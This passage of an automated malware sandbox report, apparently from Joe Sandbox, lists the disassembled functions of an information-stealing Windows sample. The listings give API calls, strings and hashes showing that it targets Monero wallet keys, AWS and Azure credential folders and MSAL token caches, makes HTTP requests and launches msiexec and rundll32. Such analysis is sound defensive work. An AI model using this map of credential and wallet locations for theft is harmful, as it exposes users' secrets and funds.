                              • Instruction Fuzzy Hash: B2121CB192012CAACB15EBA4DC95FEEB378FF14740F5181A9F20A66091DF702A49CF75
                              Function 00DECEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,01979D18,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DECF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00DED0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DED0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 00DED208
                              • lstrcat.KERNEL32(?,00E01478), ref: 00DED217
                              • lstrcat.KERNEL32(?,00000000), ref: 00DED22A
                              • lstrcat.KERNEL32(?,00E0147C), ref: 00DED239
                              • lstrcat.KERNEL32(?,00000000), ref: 00DED24C
                              • lstrcat.KERNEL32(?,00E01480), ref: 00DED25B
                              • lstrcat.KERNEL32(?,00000000), ref: 00DED26E
                              • lstrcat.KERNEL32(?,00E01484), ref: 00DED27D
                              • lstrcat.KERNEL32(?,00000000), ref: 00DED290
                              • lstrcat.KERNEL32(?,00E01488), ref: 00DED29F
                              • lstrcat.KERNEL32(?,00000000), ref: 00DED2B2
                              • lstrcat.KERNEL32(?,00E0148C), ref: 00DED2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 00DED2D4
                              • lstrcat.KERNEL32(?,00E01490), ref: 00DED2E3
                                • Part of subcall function 00DFA820: lstrlen.KERNEL32(00DE4F05,?,?,00DE4F05,00E00DDE), ref: 00DFA82B
                                • Part of subcall function 00DFA820: lstrcpy.KERNEL32(00E00DDE,00000000), ref: 00DFA885
                              • lstrlen.KERNEL32(?), ref: 00DED32A
                              • lstrlen.KERNEL32(?), ref: 00DED339
                                • Part of subcall function 00DFAA70: StrCmpCA.SHLWAPI(01978A20,00DEA7A7,?,00DEA7A7,01978A20), ref: 00DFAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 00DED3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: c26f1de6c67ff72ca5c5f5a8a0a0073822e38c5c879045209ff9e807791361a6
                              • Instruction ID: f2a94d4f619e5b62b5bc4d2cc2ef7357dcc6e0e24b4631efe375152d5845d79e
                              • Opcode Fuzzy Hash: c26f1de6c67ff72ca5c5f5a8a0a0073822e38c5c879045209ff9e807791361a6
                              • Instruction Fuzzy Hash: 52E13FB1910109ABCB24FBA4DD96EFE7378EF14300F118158F60AB7495DE75AA09CB71
                              Function 00DEC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0197CDA0,00000000,?,00E0144C,00000000,?,?), ref: 00DECA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00DECA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00DECA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DECAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00DECAD9
                              • StrStrA.SHLWAPI(?,0197CDD0,00E00B52), ref: 00DECAF7
                              • StrStrA.SHLWAPI(00000000,0197CD10), ref: 00DECB1E
                              • StrStrA.SHLWAPI(?,0197D050,00000000,?,00E01458,00000000,?,00000000,00000000,?,019789D0,00000000,?,00E01454,00000000,?), ref: 00DECCA2
                              • StrStrA.SHLWAPI(00000000,0197D1F0), ref: 00DECCB9
                                • Part of subcall function 00DEC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00DEC871
                                • Part of subcall function 00DEC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00DEC87C
                              • StrStrA.SHLWAPI(?,0197D1F0,00000000,?,00E0145C,00000000,?,00000000,019789E0), ref: 00DECD5A
                              • StrStrA.SHLWAPI(00000000,019787C0), ref: 00DECD71
                                • Part of subcall function 00DEC820: lstrcat.KERNEL32(?,00E00B46), ref: 00DEC943
                                • Part of subcall function 00DEC820: lstrcat.KERNEL32(?,00E00B47), ref: 00DEC957
                                • Part of subcall function 00DEC820: lstrcat.KERNEL32(?,00E00B4E), ref: 00DEC978
                              • lstrlen.KERNEL32(00000000), ref: 00DECE44
                              • CloseHandle.KERNEL32(00000000), ref: 00DECE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: d841fb3369bcdc9e7180d58ceb1fae0e6db283f69de37d05bdd473f3e87a87ca
                              • Instruction ID: 820abd9a2c99cc36af665e1157b14b8287853009bdf1b7b3f9e2cedb2a073d36
                              • Opcode Fuzzy Hash: d841fb3369bcdc9e7180d58ceb1fae0e6db283f69de37d05bdd473f3e87a87ca
                              • Instruction Fuzzy Hash: 34E1FAB190010CABDB14EBA8DC91FEEB778EF14340F518169F20A67195EF746A4ACB71
                              Function 00DF8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • RegOpenKeyExA.ADVAPI32(00000000,0197AA38,00000000,00020019,00000000,00E005B6), ref: 00DF83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00DF8426
                              • wsprintfA.USER32 ref: 00DF8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00DF847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00DF848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00DF8499
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: cb124e3b98d666f204abdd15ad796c068720da23b2af16610ab868a8127d6637
                              • Instruction ID: 3f089b1bdefd73cc9cad1ba060acf4c3effa55405a80c650d604da3c3ce8108a
                              • Opcode Fuzzy Hash: cb124e3b98d666f204abdd15ad796c068720da23b2af16610ab868a8127d6637
                              • Instruction Fuzzy Hash: 7481E9B191011CAADB24DF54CC95FEAB7B8FF08700F10C299E24AA6180DF756B85CFA5
                              Function 00DF4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00DF4DCD
                                • Part of subcall function 00DF4910: wsprintfA.USER32 ref: 00DF492C
                                • Part of subcall function 00DF4910: FindFirstFileA.KERNEL32(?,?), ref: 00DF4943
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00DF4E59
                                • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E00FDC), ref: 00DF4971
                                • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E00FE0), ref: 00DF4987
                                • Part of subcall function 00DF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00DF4B7D
                                • Part of subcall function 00DF4910: FindClose.KERNEL32(000000FF), ref: 00DF4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00DF4EE5
                                • Part of subcall function 00DF4910: wsprintfA.USER32 ref: 00DF49B0
                                • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E008D2), ref: 00DF49C5
                                • Part of subcall function 00DF4910: wsprintfA.USER32 ref: 00DF49E2
                                • Part of subcall function 00DF4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00DF4A1E
                                • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,0197F168), ref: 00DF4A4A
                                • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,00E00FF8), ref: 00DF4A5C
                                • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,?), ref: 00DF4A70
                                • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,00E00FFC), ref: 00DF4A82
                                • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,?), ref: 00DF4A96
                                • Part of subcall function 00DF4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00DF4AAC
                                • Part of subcall function 00DF4910: DeleteFileA.KERNEL32(?), ref: 00DF4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 3faba08c3af28a23587f05be73614eb1874adef883078ddd8a05454207da64f7
                              • Instruction ID: 9fa994384c9c535d649e9dff0970656319d2ee21192f2bdd4ac852fae363afb0
                              • Opcode Fuzzy Hash: 3faba08c3af28a23587f05be73614eb1874adef883078ddd8a05454207da64f7
                              • Instruction Fuzzy Hash: 674134BAA4030867DB64F770DC47FED7238AB64700F408594B689660C5EEF55BC98BB2
                              Function 00DF9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DF906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: b0b3e8d365fa52f9ec40760e34cc584829ac7292f25be43e1c03123d24887c26
                              • Instruction ID: c892d95941ad8e07dc0fd19c187c92a19c8d39e3bb643839c34ab3ca217bf6dd
                              • Opcode Fuzzy Hash: b0b3e8d365fa52f9ec40760e34cc584829ac7292f25be43e1c03123d24887c26
                              • Instruction Fuzzy Hash: 3B71DE75A10208EBDB24EFE4D899FEDB7B8FB48700F108518F655A7284DB79A905CB70
                              Function 00DF2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00DF31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00DF335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00DF34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 069a164d0a6710d345fe8d0d65f23e1afbef7a46868d733c3c41ef91f8691741
                              • Instruction ID: 9d19018d75c661d0e814823977b029c6a49a5106de92851e9ceb07bc7b1f90e3
                              • Opcode Fuzzy Hash: 069a164d0a6710d345fe8d0d65f23e1afbef7a46868d733c3c41ef91f8691741
                              • Instruction Fuzzy Hash: BB120AB180011C9ADB14EBA4CC92FFEB738EF14340F558169E60A66195EF746B4ACF72
                              Function 00DF52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DE6280: InternetOpenA.WININET(00E00DFE,00000001,00000000,00000000,00000000), ref: 00DE62E1
                                • Part of subcall function 00DE6280: StrCmpCA.SHLWAPI(?,0197F1D8), ref: 00DE6303
                                • Part of subcall function 00DE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE6335
                                • Part of subcall function 00DE6280: HttpOpenRequestA.WININET(00000000,GET,?,0197E7B8,00000000,00000000,00400100,00000000), ref: 00DE6385
                                • Part of subcall function 00DE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DE63BF
                                • Part of subcall function 00DE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE63D1
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF5318
                              • lstrlen.KERNEL32(00000000), ref: 00DF532F
                                • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00DF5364
                              • lstrlen.KERNEL32(00000000), ref: 00DF5383
                              • lstrlen.KERNEL32(00000000), ref: 00DF53AE
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 01cdcae6fd19d1032e98439ef5fe5296c7c72aec7665c78604d391a7f65bd52c
                              • Instruction ID: afa53f67dce48a85b6d2a34c05295f8c277d57ac597e948399c205c45a88f1b6
                              • Opcode Fuzzy Hash: 01cdcae6fd19d1032e98439ef5fe5296c7c72aec7665c78604d391a7f65bd52c
                              • Instruction Fuzzy Hash: 6C513AB091014D9BCB14FF68C992AFD3778EF10340F55C018EA0A6A595EF74AB45CB72
                              Function 00DF12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
